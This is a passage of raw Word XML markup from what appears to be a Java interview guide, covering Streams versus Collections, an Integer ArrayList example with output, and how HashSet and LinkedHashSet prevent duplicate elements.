    </w:p>
    <w:p w14:paraId="6F7A3126" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a more flexible and concise approach to data processing but are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-mutating</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lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in nature, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are better for scenarios where you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the underlying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C700E31" w14:textId="49314F81" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F609E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1356A07">
          <v:rect id="_x0000_i1481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142D941" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00F609ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1EF169" w14:textId="77777777" w:rsidR="000475CE" w:rsidRPr="00CE4B95" w:rsidRDefault="000475CE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc196307622"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a syntax for integer ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="1F084B8E" w14:textId="6DEFB22E" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">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o create an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for integers in Java, you can use the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class from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. Here's the syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C474EBF" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393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yntax for Integer ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4A5CA" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25791D43" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326455F4" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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IntegerArrayListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E423779" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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5D5701E2" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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ing an ArrayList of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF02EA3" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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rrayList&lt;Integer&gt; intList = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A26DD" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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BF1CBAA" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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dding elements to the ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F41BB" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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List.add(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782957E8" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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List.add(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E493A" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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List.add(30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC3047" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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List.add(40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104F772" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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695C096" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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nting the ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09EAC0" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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ArrayList: " + intList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F7A54" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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A84B34B" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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FDF28B9" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A314D" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 intList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This creates an ArrayList that stores </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B226A0" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class is used because ArrayList can only store objects, not primitive types like int. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class wraps the primitive int as an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D807ED2" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dd() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The add() method is used to add elements to the ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E2F0E" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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utput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This code will output the elements of the ArrayList when printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB01F8D" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393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ample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B73A8A" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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rayList: [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45569CFB" w14:textId="28C86087" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0057692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3185D85">
          <v:rect id="_x0000_i1482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="606726CC" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="00576921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D440B15" w14:textId="77777777" w:rsidR="00C90B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90B00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc196307623"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can Set not store duplicate values? Explain internal working?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="78D8EB52" w14:textId="6E476064" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a collection in Java that does not allow duplicate elements. The key reason behind this behavior is that a Set is based on a mathematical </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concept, which only allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements. Java provides several implementations of the Set interface, including HashSet, LinkedHashSet, and TreeSet, each with slightly different internal workings but following the same general rule of not storing duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C8A971" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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ternal Working of Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119293F" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Set (Most Common Implementation of Set)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D501D86" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementation of the Set interface internally uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store its elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558943AB" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Each element in a HashSet is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the hashCode() method. This hash value helps in determining the bucket or slot in which the element should be placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF5D47C" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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try to add an element to the HashSet, the following steps occur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE558F6" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the element is calculated using its hashCode() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92ACE2" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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hash code is used to find the corresponding bucket (or index) in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF39F0" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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an element with the same hash code already exists in that bucket, it then checks for equality using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E6BE0" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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the element is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an existing element (i.e., hashCode() is the same and equals() returns true), the element is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not added</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D595A" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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no such element exists, the new element is added to the Set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73399787" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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is process ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored in the HashSet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376FAFA" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0686EFB6" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extends HashSet, and it maintains the insertion order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6D703" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
